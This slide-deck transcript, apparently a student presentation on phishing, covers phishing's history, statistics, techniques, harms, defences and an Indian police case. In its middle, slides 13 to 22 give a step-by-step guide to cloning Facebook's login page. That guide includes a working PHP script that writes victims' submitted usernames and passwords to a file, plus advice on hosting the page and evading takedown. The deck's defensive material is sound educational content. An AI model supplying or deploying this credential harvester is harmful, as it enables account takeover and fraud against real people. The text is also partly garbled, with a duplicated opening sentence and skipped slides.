In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details, by masquerading as a trustworthy entity in an electronic attempting to acquire sensitive information such as usernames, passwords and credit card details, by masquerading as a trustworthy entity in an electronic communication. Phishing is a fraudulent e-mail that attempts to get you to divulge personal data that can then be used for illegitimate purposes.
2. Agenda
1:- INTRODUCTION,DEFINITION AND DESCRIPTION OF
PHISHING
2:- HISTORY AND CURRENT STATUS OF PHISHING
3:- PHISHING TECHNIQUES
4:- HACKING FACEBOOK ACCOUNTS BY PHISHING – STEP
BY STEP!
5:- DAMAGED CAUSED BY PHISHING AND ANTIPHISHING
6:-How To Combat Phishing
What to do ? And What not to do?
7:- RECENT PHISHING ATTEMPTS,LEGAL RESPONSE AND
CASE STUDY
3. DEFINITION AND DESCRIPTION
• Phishing is an act of attempt to acquire information such as
usernames,passwords, and credit card details,etc of a person
or organization illegaly in an electronic communication.
• Phishing is committed so that the Phisher may obtain sensitive
and valuable information about a consumer, usually with the
goal of fraud to obtain the customer bank and other financial
information.
• Phishing are typically carried out by e-mail spoofing or instant
messaging.
4.
5. • In phishing the criminals creates a fake website whose looks
and feel are identical to the legitimate one, in which the
victims are told to enter their confidential details like
username, password or account details.
• Phishing technique was described in detail in the year 1987
and this technique was first used in the year 1995
• Phishing is mainly commited ,so that the criminal may obtain
sensitive & valuable information about the customer.
• Phishing makes high profit with less or small technological
investment
6. History
Phreaking + Fishing = Phishing
- Phreaking = making phone calls for free back in 70’s
• - Fishing = Use bait to lure the target
Phishing in 1995
Target: AOL users
Purpose: getting account passwords for free time
Threat level: low
Techniques: Similar names ( www.ao1.com for www.aol.com ), social
engineering
Phishing in 2001
Target: Ebayers and major banks
Purpose: getting credit card numbers, accounts
Threat level: medium
Techniques: Same in 1995, keylogger
Phishing in 2007
Target: Paypal, banks, ebay
Purpose: bank accounts
Threat level: high
Techniques: browser vulnerabilities, link obfuscation
7. Current status of Phishing
• • The APWG received 26,150 unique phishing reports.
• This total represents the second highest number of phishing
reports that the APWG has received in a single month.
• • The APWG detected 10,091 unique phishing websites
worldwide.
• • 148 separate corporate brands were “hijacked” (misused) in
phishing schemes (compared to 84 in August 2005v).
• • The financial sector was the most heavily targeted for
phishing schemes, constituting 92.6 percent of all phishing
attacks
8. • • The APWG found 2,303 unique websites that hosted
“keylogging.” programs.
• • The United States was the country hosting the largest
percentage of phishing websites (27.7 percent, compared to
27.9 percent in August 2005), while Canada ranked ninth
among countries hosting such websites (2.2 percent,
compared to 2.21 percent in August 2005). China remains the
second most frequent host of phishing websites (14 percent,
compared to 12.15 percent in August 2005), and South Korea
the third most frequent host of such sites (9.59 percent,
compared to 9.6 percent in August 2005).
9. • A very recent and popular case of phishing is that the chinese
phishers are targeting GMAIL account of high ranked official of
united states,south korea government and military
information & chinese political activities.
10. Phishing Technique
Deceptive - Sending a deceptive email, in bulk, with
a “call to action” that demands the recipient click on
a link.
Malware-Based - Running malicious software on the user’s
machine. Various forms of malware-based phishing are:
Key Loggers & Screen Loggers
Session Hijackers
Web Trojans
Data Theft
DNS-Based - Phishing that interferes with the integrity of the
lookup process for a domain name. Forms of DNS-based phishing
are:
Hosts file poisoning
Polluting user’s DNS cache
Proxy server compromise
11. Content-Injection – Inserting malicious content into legitimate
site.
Three primary types of content-injection phishing:
Hackers can compromise a server through a security
vulnerability and replace or augment the legitimate
content with malicious content.
Malicious content can be inserted into a site through a
cross-site scripting vulnerability.
Malicious actions can be performed on a site through a
SQL injection vulnerability.
12. • Man-in-the-Middle Phishing - Phisher positions
himself between the user and the legitimate site.
• Search Engine Phishing - Create web pages for fake
products, get the pages indexed by search engines,
and wait for users to enter their confidential
information as part of an order, sign-up, or balance
transfer.
13. Step To Hack Facebook
• Step 1: Go to http://www.facebook.com and right-click on the
home page and select view page source.
14. • Step 2: Find for something which looks like this :
15. Step 3: Then change the action URL to login.php, now it will
look similar to this.
Save it as index.html.
16. • Step 4: Open a notepad and paste the following code inside it and
save as login.php.
<?php
header (‘Location: http://www.facebook.com’);
$handle = fopen(“passwords.txt”, “a”);
foreach($_POST as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>
Here, the victim will be redirected to http://www.facebook.com. You
can change it to your desired location by editing the arguments of
header function in the above PHP code.
17. • Step 5: Create another blank text file for storing the hacked
usernames and passwords and name it as passwords.txt.
Now you are done with the setup of phishing page, all you
need to do is host it somewhere on internet so that it
becomes available to your victim.
• Step 6: Go to some free hosting site
like http://www.000webhost.com and sign up for free. You will
be provided with 1.5GB free space to host your web pages and
free domain. You will have to complete email confirmation
step to get your web page running.
18. • Step 7: Once you get your account activated, sign in and
click Go to CPanel as shown below.
20. • Step 9: Now you will see a folder public html in the web
based ftp client page, click on the folder and open it.
21. • Step 10: Click on Upload and select all the 3 files and finally
click on the green tick to upload them as shown in the image
below.
• Once you get your files uploaded you can check your page at
your registered domain.
22. • The victim’s password will be automatically written
into passwords.txt file, just open the file to see the username
and password!
• Congratulations you are done creating your phishing page! If
you have understood everything perfectly then you can use
this technique to create phishing pages for other sites also.
• Note: Phishing pages at free hosting services will be
immediately deleted, if once detected. So my advice is to use
a paid hosting service or else host it on your system.
23. DAMAGE CAUSE BY PHISHING
• The Impact of phishing are both domestic and international,
that are concern with the commercial and financial sectors.
• Direct Financial Loss. Phishing technique is mainly done to
make financial loss to a person or an organization. In this and
consumers and businesses may lose from a few hundred
dollars to millions of dollars.
• • Erosion of Public Trust in the Internet. Phishing also
decreases the public’s trust in the Internet.
24.
25. • A survey found that 9 out of 10 American adult Internet users
have made changes to their Internet habits because of the
threat of identity theft.
• The 30 percent say that they reduced their overall usage.
• The 25 percent say they have stopped shopping online, while
29 percent of those that still shop online say they have
decreased the frequency of their purchases.
26. Anti-Phishing
Anti-Phishing Working Group (APWG)
The APWG has over 2300+ members from over
1500 companies & agencies worldwide. Member
companies include leading security companies such
as Symantec, McAfee and VeriSign. Financial
Industry members include the ING Group,VISA,
Mastercard and the American Bankers Association.
27. Educate application users
Think before you open
Never click on the links in an email , message boards or mailing
lists
Never submit credentials on forms embedded in emails
Inspect the address bar and SSL certificate
Never open suspicious emails
Ensure that the web browser has the latest security patch applied
Install latest anti-virus packages
Destroy any hard copy of sensitive information
Verify the accounts and transactions regularly
Report the scam via phone or email.
28. Formulate and enforce Best practices
Authorization controls and access privileges for systems,
databases and applications.
Access to any information should be based on need-to-
know principle
Segregation of duties.
Media should be disposed only after erasing sensitive
information.
Reinforce application development / maintenance processes:
1. Web page personalization
Using two pages to authenticate the users.
Using Client-side persistent cookies.
2. Content Validation
Never inherently trust the submitted data
Never present the submitted data back to an application user
without sanitizing the same
Always sanitize data before processing or storing
Check the HTTP referrer header
29. 3. Session Handling
Make session identifiers long, complicated and difficult to
guess.
Set expiry time limits for the SessionID’s and should be
checked for every client request.
Application should be capable of revoking active SessionID’s
and not recycle the same SessionID.
Any attempt the invalid SessionID should be redirected to the
login page.
Never accept session information within a URL.
Protect the session via SSL.
Session data should be submitted as a POST.
After authenticating, a new SessionID should be used (HTTP &
HTTPS).
Never let the users choose the SessionID.
4. Image Regulation
Image Cycling
Session-bound images
30. 5. URL Qualification
Do not reference redirection URL in the browser’s URL
Always maintain a valid approved list of redirection url’s
Never allow customers to supply their own URL’s
Never allow IP addresses to be user in URL information
6. Authentication Process
Ensure that a 2-phase login process is in place
Personalize the content
Design a strong token-based authentication
7. Transaction non-repudiation
To ensure authenticity and integrity of the transaction
31. PREVENTION TO BE TAKEN
TO AVOID PHISHING
• 1. Prevention: What to Do
• Protect your computer with anti-virus software, spyware
filters, e-mail filters, and firewall programs, and make sure
that they are regularly updated.
• Ensure that your Internet browser is up to date and security
patches applied.
• Avoid responding to any unknown email or giving your
financial information to that mail.
32. • Unless the e-mail is digitally signed, it should also be fake.
• Phishers typically ask for information such as usernames,
passwords, credit card numbers, social security numbers, etc.
• Phisher e-mails are typically not personalized, while valid
messages from your bank or e-commerce company are
generally personalized.
• • Always ensure that you're using a secure website when
submitting credit card or other sensitive information via your
Web browser.
33. • To make sure you're on a secure Web server, check the
beginning of the Web address in your browsers address bar - it
should be "https://" rather than just "http://."
• Regularly log into your online accounts. Don't leave them for
a long period of time.
• Regularly check your bank, credit and debit card statements
to ensure that all transactions are legitimate.
• If anything is suspicious, contact your bank and all card
issuers.
34.
35. 2. Prevention: What Not to Do
• Don't assume that you can correctly identify a website
as legitimate by just looking at it.
• Don’t use the links in an e-mail to get to any web page, if
you think that the message might not be authentic.
log onto the website directly by typing in the Web address
in your browser.
• Avoid filling out forms in e-mail messages that ask for
personal financial information.
36. • You should only communicate information such as credit card
numbers or account information via a secure website or the
telephone.
37. What does all the above imply?
It is better to be safer now than feel sorry later.
38. Case study
Case - fraud done by Mumbai mafia in IT city
City- Bangalore
State- karnatka
Background
•
• The cyber crime police of Bangalore, after a two year
investigation have proved that the Mumbai mafia is phishing
the it city
• In this they have arrested three persons in connection in with
3 different incident.
•
• A cid official of SP’s rank said that this is a dangerous trend.
39. The cyber crime police station (CCPS) registered around
100 such phishing cases in 2009,but it’s difficult for
them to trace every case as they use benami bank
account to do all this.
In this the cyber crime police had arrested 3 person ,all
from Mumbai who are connected with this case.
• The police said that all the arrested person are graduate
and have a good knowledge in computer
40. Investigation
• The cyber crime police had arrested one abdul khan from
Mumbai.
• The arrested person had transferred rs 1 lakh (rs 50000 in
twice) from the icici account of one it professional abhishek
malvia anative of itarsi , Madhya Pradesh.
41. Conclusion
• Phishing is a form of criminal conduct that poses increasing
threats to consumers, financial institutions, and commercial
enterprises in Canada, the United States, and other countries.
Because phishing shows no sign of abating, and indeed is likely
to continue in newer and more sophisticated forms, law
enforcement, other government agencies, and the private
sector in both countries will need to cooperate more closely
than ever in their efforts to combat phishing, through
improved public education, prevention, authentication, and
binational and national enforcement efforts.